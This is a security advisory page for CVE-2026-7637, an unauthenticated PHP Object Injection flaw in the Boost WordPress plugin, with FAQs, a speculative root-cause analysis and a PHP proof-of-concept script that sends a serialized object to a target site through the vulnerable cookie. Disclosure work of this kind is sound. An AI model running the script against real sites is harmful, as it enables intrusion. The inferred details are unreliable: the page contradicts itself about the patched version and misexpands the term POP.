What is CVE-2026-7637?

CVE-2026-7637 is a critical vulnerability in the Boost plugin for WordPress, affecting versions up to and including 2.0.3. It allows unauthenticated attackers to exploit PHP Object Injection through the STYXKEY-BOOST_USER_LOCATION cookie, potentially leading to remote code execution if a vulnerable PHP Object Payload (POP) chain exists.

How does this vulnerability work?

The vulnerability arises from the plugin’s failure to properly sanitize the STYXKEY-BOOST_USER_LOCATION cookie before deserializing its value. An attacker can craft a malicious cookie that, when processed, injects a PHP object into the application, which can be exploited if a compatible POP chain is present.

Who is affected by this vulnerability?

Any WordPress site using the Boost plugin version 2.0.3 or earlier is at risk. Administrators should check their plugin versions and update if they are using an affected version to mitigate the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Boost plugin installed. If it is version 2.0.3 or earlier, your site is at risk. Additionally, review server logs for unusual cookie values or requests that may indicate exploitation attempts.

How can I fix this vulnerability?

The recommended fix is to update the Boost plugin to version 2.0.4 or later, where the vulnerability has been patched. If immediate updates are not possible, consider implementing input validation and sanitization for the STYXKEY-BOOST_USER_LOCATION cookie.

What does the CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical severity level, suggesting that successful exploitation can lead to complete compromise of the WordPress site. This includes potential remote code execution, deletion of files, and unauthorized access to sensitive data.

What is a PHP Object Injection vulnerability?

PHP Object Injection occurs when an application deserializes untrusted data without proper validation, allowing attackers to inject arbitrary PHP objects. This can lead to various exploits depending on the presence of a compatible POP chain in the application.

A PHP Object Payload (POP) chain is a sequence of PHP objects that can be exploited to perform malicious actions when injected into an application. If a vulnerable POP chain exists in other plugins or themes, it can be leveraged to execute arbitrary code or manipulate the application.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can craft a malicious serialized PHP object and send it as a cookie to the target site. This demonstrates the vulnerability by showing how the application can be tricked into executing the injected object if a suitable POP chain is present.

What should I do if I cannot update the plugin immediately?

If an immediate update is not feasible, consider disabling the Boost plugin temporarily until a patch can be applied. Additionally, implement input validation for cookies and monitor your site for any suspicious activity or unauthorized access attempts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-7637: Boost <= 2.0.3 – Unauthenticated PHP Object Injection via STYXKEY-BOOST_USER_LOCATION Cookie (boost)

CVE ID CVE-2026-7637

Plugin boost

Severity Critical (CVSS 9.8)

CWE 502

Vulnerable Version 2.0.3

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7637 (metadata-based): This vulnerability affects the Boost plugin for WordPress versions up to and including 2.0.3. It is an unauthenticated PHP Object Injection vulnerability with a CVSS score of 9.8, classified as CWE-502 (Deserialization of Untrusted Data). The vulnerability resides in how the plugin processes the STYXKEY-BOOST_USER_LOCATION cookie without proper sanitization.

Root Cause: The plugin likely retrieves and calls PHP’s unserialize() or a similar deserialization function on the STYXKEY-BOOST_USER_LOCATION cookie value. This cookie is used to store user-specific location data for caching or personalization features. Atomic Edge research infers that the plugin does not validate or sanitize the cookie input before deserialization. No code diff was available to confirm the exact vulnerable function, but the CWE classification strongly indicates a missing check on the cookie value before deserialization.

Exploitation: An unauthenticated attacker sends an HTTP request containing a crafted STYXKEY-BOOST_USER_LOCATION cookie with a malicious serialized PHP object. The attack vector is the front-end request, as the cookie is processed during page load. No specific AJAX action or REST endpoint is required. The attacker can inject arbitrary PHP objects. If a POP chain exists in another plugin or theme on the same site, the attacker can leverage it to execute arbitrary code, delete files, or exfiltrate data.

Remediation: The fix must replace the insecure unserialize() call with a safe alternative. The recommended approach is to use json_decode() and json_encode() for handling the cookie data, or to implement a whitelist of allowed classes if deserialization is required. The plugin should also validate the cookie structure using a hash or signature to prevent tampering. Atomic Edge analysis suggests the patch in version 2.0.4 likely implements these changes.

Impact: Successful exploitation can lead to complete compromise of the WordPress site. An attacker could achieve remote code execution, delete arbitrary files, or access sensitive data, depending on available POP chains. The CVSS vector indicates high impact on confidentiality, integrity, and availability.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7637 - Boost <= 2.0.3 - Unauthenticated PHP Object Injection via STYXKEY-BOOST_USER_LOCATION Cookie

// Configuration
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

// Exploit parameters
// Since no specific POP chain is provided, we demonstrate injection of a generic serialized object
// In a real attack, the payload would be crafted based on available POP chains (e.g., from other plugins/themes)
// This PoC sends a malformed serialized object to trigger PHP object instantiation

// Create a malicious serialized payload (example: creates a stdClass object)
// In real exploitation, use a proper POP chain gadget
$malicious_object = new stdClass();
$malicious_object->test = 'injected';
$payload = serialize($malicious_object);

// URL-encode for cookie
$cookie_value = urlencode($payload);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Cookie: STYXKEY-BOOST_USER_LOCATION=' . $cookie_value . ';'
));

// Send the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
echo 'HTTP Response Code: ' . $http_code . PHP_EOL;
echo 'Request sent to: ' . $target_url . PHP_EOL;
echo 'Injected payload (serialized): ' . $payload . PHP_EOL;
echo PHP_EOL . 'Note: This PoC demonstrates the injection vector. Actual impact depends on presence of a POP chain in other installed plugins/themes.' . PHP_EOL;

Frequently Asked Questions

What is CVE-2026-7637?
Understanding the vulnerability
CVE-2026-7637 is a critical vulnerability in the Boost plugin for WordPress, affecting versions up to and including 2.0.3. It allows unauthenticated attackers to exploit PHP Object Injection through the STYXKEY-BOOST_USER_LOCATION cookie, potentially leading to remote code execution if a vulnerable PHP Object Payload (POP) chain exists.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to properly sanitize the STYXKEY-BOOST_USER_LOCATION cookie before deserializing its value. An attacker can craft a malicious cookie that, when processed, injects a PHP object into the application, which can be exploited if a compatible POP chain is present.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Boost plugin version 2.0.3 or earlier is at risk. Administrators should check their plugin versions and update if they are using an affected version to mitigate the vulnerability.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Boost plugin installed. If it is version 2.0.3 or earlier, your site is at risk. Additionally, review server logs for unusual cookie values or requests that may indicate exploitation attempts.
How can I fix this vulnerability?
Remediation steps
The recommended fix is to update the Boost plugin to version 2.0.4 or later, where the vulnerability has been patched. If immediate updates are not possible, consider implementing input validation and sanitization for the STYXKEY-BOOST_USER_LOCATION cookie.
What does the CVSS score of 9.8 indicate?
Understanding severity
A CVSS score of 9.8 indicates a critical severity level, suggesting that successful exploitation can lead to complete compromise of the WordPress site. This includes potential remote code execution, deletion of files, and unauthorized access to sensitive data.
What is a PHP Object Injection vulnerability?
Defining the concept
PHP Object Injection occurs when an application deserializes untrusted data without proper validation, allowing attackers to inject arbitrary PHP objects. This can lead to various exploits depending on the presence of a compatible POP chain in the application.
What is a POP chain?
Explaining the term
A PHP Object Payload (POP) chain is a sequence of PHP objects that can be exploited to perform malicious actions when injected into an application. If a vulnerable POP chain exists in other plugins or themes, it can be leveraged to execute arbitrary code or manipulate the application.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration
The proof of concept provided illustrates how an attacker can craft a malicious serialized PHP object and send it as a cookie to the target site. This demonstrates the vulnerability by showing how the application can be tricked into executing the injected object if a suitable POP chain is present.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not feasible, consider disabling the Boost plugin temporarily until a patch can be applied. Additionally, implement input validation for cookies and monitor your site for any suspicious activity or unauthorized access attempts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations